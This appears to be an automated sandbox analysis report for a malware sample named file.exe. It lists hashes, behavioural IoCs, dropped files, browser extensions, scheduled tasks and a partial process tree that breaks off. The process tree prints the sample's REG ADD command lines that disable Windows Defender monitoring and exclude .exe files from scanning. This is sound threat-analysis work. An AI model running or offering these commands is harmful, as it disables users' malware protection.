Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
124s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
10/01/2023, 07:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
397ddcd4d6061cdb5f2e1abdaa09abfc
-
SHA1
60d9de478928374c1db58d5fe201de8eb18705fb
-
SHA256
355df10be933d89d3ca048a35a06b58e0f80a7b58b3088da45d4ada7939944dc
-
SHA512
4bf7ad2dd5005cac3f62aa3b564ee4889e768a0b5da6302e863ea0d68de7456af2e8ccdf5c7122a519084b6d9d26de99804b3fc18e998c666b15da784f140810
-
SSDEEP
196608:91OYkpNulBE4vbQJT6R3xTN1tR1hTrzaTuYpgPH6ze1:3OYk2lBlT3R3x5JyvKyze1
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\txBXwMIRPrsSMVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PdIuKibDUUQxOHXi = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lzmeupYjvcHU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gAVxmqQUvZVtC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PdIuKibDUUQxOHXi = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aCihPuJdU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gAVxmqQUvZVtC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CjFbSUxMfeUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CjFbSUxMfeUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aCihPuJdU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PdIuKibDUUQxOHXi = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lzmeupYjvcHU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\txBXwMIRPrsSMVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PdIuKibDUUQxOHXi = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1952 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 880 Install.exe 776 Install.exe 1692 Emqfydw.exe 112 AsfriZX.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation AsfriZX.exe -
Loads dropped DLL 12 IoCs
pid Process 1696 file.exe 880 Install.exe 880 Install.exe 880 Install.exe 880 Install.exe 776 Install.exe 776 Install.exe 776 Install.exe 1952 rundll32.exe 1952 rundll32.exe 1952 rundll32.exe 1952 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json AsfriZX.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AsfriZX.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 AsfriZX.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Emqfydw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Emqfydw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D AsfriZX.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Emqfydw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D AsfriZX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 AsfriZX.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\aCihPuJdU\lxZNkZ.dll AsfriZX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AsfriZX.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AsfriZX.exe File created C:\Program Files (x86)\lzmeupYjvcHU2\FlYxIZWNXkWZj.dll AsfriZX.exe File created C:\Program Files (x86)\lzmeupYjvcHU2\DWAfuap.xml AsfriZX.exe File created C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR\BZpBJrN.dll AsfriZX.exe File created C:\Program Files (x86)\gAVxmqQUvZVtC\xGtqzgA.dll AsfriZX.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AsfriZX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja AsfriZX.exe File created C:\Program Files (x86)\aCihPuJdU\miJTdvt.xml AsfriZX.exe File created C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR\iPKLYJK.xml AsfriZX.exe File created C:\Program Files (x86)\gAVxmqQUvZVtC\jlREteD.xml AsfriZX.exe File created C:\Program Files (x86)\CjFbSUxMfeUn\AmIIrde.dll AsfriZX.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bmkQfSnzPaOQmejIPN.job schtasks.exe File created C:\Windows\Tasks\bCsHVTpDKRsgJbbvM.job schtasks.exe File created C:\Windows\Tasks\DWGOMtUonAyVmtF.job schtasks.exe File created C:\Windows\Tasks\yraZWSSXLaCwWiCxD.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 240 schtasks.exe 860 schtasks.exe 1740 schtasks.exe 1676 schtasks.exe 908 schtasks.exe 552 schtasks.exe 1112 schtasks.exe 1792 schtasks.exe 1960 schtasks.exe 364 schtasks.exe 2000 schtasks.exe 1416 schtasks.exe 1020 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 AsfriZX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix AsfriZX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 AsfriZX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{625E15EB-A98F-4140-9A9F-E9E136575F35}\WpadDecision = "0" AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{625E15EB-A98F-4140-9A9F-E9E136575F35}\ca-47-6c-14-94-31 AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{625E15EB-A98F-4140-9A9F-E9E136575F35}\WpadDecisionReason = "1" AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31 AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates AsfriZX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" AsfriZX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{625E15EB-A98F-4140-9A9F-E9E136575F35} AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs AsfriZX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 AsfriZX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" AsfriZX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecisionReason = "1" AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{625E15EB-A98F-4140-9A9F-E9E136575F35}\ca-47-6c-14-94-31 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecisionTime = c08e6975cd24d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecision = "0" AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs AsfriZX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f004d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad AsfriZX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-47-6c-14-94-31\WpadDecisionTime = c08e6975cd24d901 AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings AsfriZX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs AsfriZX.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1676 powershell.EXE 1676 powershell.EXE 1676 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 828 powershell.EXE 828 powershell.EXE 828 powershell.EXE 1380 powershell.EXE 1380 powershell.EXE 1380 powershell.EXE 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe 112 AsfriZX.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1676 powershell.EXE Token: SeDebugPrivilege 1628 powershell.EXE Token: SeDebugPrivilege 828 powershell.EXE Token: SeDebugPrivilege 1380 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 1696 wrote to memory of 880 1696 file.exe 28 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 880 wrote to memory of 776 880 Install.exe 29 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1080 776 Install.exe 31 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 776 wrote to memory of 1272 776 Install.exe 33 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1080 wrote to memory of 1056 1080 forfiles.exe 35 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1272 wrote to memory of 1000 1272 forfiles.exe 36 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1056 wrote to memory of 304 1056 cmd.exe 37 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1000 wrote to memory of 1668 1000 cmd.exe 38 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1056 wrote to memory of 1884 1056 cmd.exe 39 PID 1000 wrote to memory of 1780 1000 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\7zSFECA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Users\Admin\AppData\Local\Temp\7zSA7D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
